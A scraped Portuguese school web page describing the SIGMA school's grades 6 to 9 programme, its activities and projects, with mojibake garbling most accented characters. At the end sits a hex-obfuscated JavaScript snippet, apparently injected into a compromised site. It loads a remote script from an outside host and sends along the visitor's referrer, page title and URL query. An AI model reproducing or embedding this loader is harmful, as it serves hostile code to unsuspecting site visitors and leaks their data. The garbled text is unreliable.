Ensino Fundamental II -A�6A? ao 9A? ano

Os conteA?dos estudados em cada componente curricular no Ensino Fundamental II do SIGMA constituem um importante instrumento para o desenvolvimento e para a compreensA?o doA�mundo. Nessa fase de transiA�A?o da infA?ncia para a adolescA?ncia, procura-se observar o ritmo individual do aluno. As atividades sA?o realizadas de forma a promover a formaA�A?o acadA?mica e pessoal do estudante.

MissA?o:Fund II

Desenvolvimento das habilidades esperadas para um profissional do sA�culo XXI, com equipe pedagA?gica preparada e atualizada, aulas em sala deA�aulaA�e foraA�dela,A�com visitas pedagA?gicas que enriquecem a aprendizagem e tornam visA�vel o que A� apresentado na escola; alA�m disso, vA?rios projetos e programas completam as atividades, proporcionando ao aluno uma formaA�A?o integral, voltada para as necessidades do mundo atual.

– Escolinha de esportes: sA?o mais de 10 prA?ticas esportivas disponA�veis para o aluno;
– PlantA�es de estudo no contra-turno;
– Aulas de apoio para reforA�ar conteA?do e treinamento para OlimpA�adas (POT);

Fundamental II


Projeto:

O LA�der em Mim: aprendizado de lideranA�a, valores e competA?ncias fundamentais para o sucesso na escola e na vida.
– Semana do Meio Ambiente: propA�e aA�A�es que melhoram nossa qualidade de vida e que mostram a importA?ncia do respeito ao meio ambiente.
– Feira Medieval: reviver a Idade MA�dia por meio de encenaA�A�es teatrais e exposiA�A�es temA?ticas.
– ExpoBrasil: os alunosA�pesquisam caracterA�sticas de cada regiA?o do Brasil e depois, em grupos, expA�em o que aprenderam para pais, professores, colegas e convidados.
– Feira de CiA?ncia e SaA?de: melhor compreensA?o sobre a nutriA�A?o humana e a alimentaA�A?o saudA?vel, por meio de pesquisas e apresentaA�A�es.

Fund II_2
– ExcursA�es pedagA?gicas: trocas de conhecimento que facilitam a aprendizagem e socializaA�A?o dos alunos e professores. Os conteA?dos contam com liA�A�es de vida, economia, organizaA�A?o, respeito, socializaA�A?o, etc.
– DicionA?rio PictogrA?fico:A�os alunos pesquisam termos geogrA?ficos iniciando com cada letra do alfabeto e confeccionam desenhos ilustrando cada termo, com o objetivo de reconhecer os conceitos necessA?rios A� aprendizagem de Geografia.
– Projeto de transiA�A?o ao Ensino MA�dio: a escola proporciona aos alunos do 9A? ano uma vivA?ncia da rotina escolar na 1A? sA�rie, por meio de aulas com professores do Ensino MA�dio.
– Semana Cultural: atividade que visa A� interaA�A?o dos alunos por meio de diversas atividades, como: prA?ticas esportivas, jogos eletrA?nicos, caracterizaA�A?o, gincanas, experimentos cientA�ficos, entre outros.

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}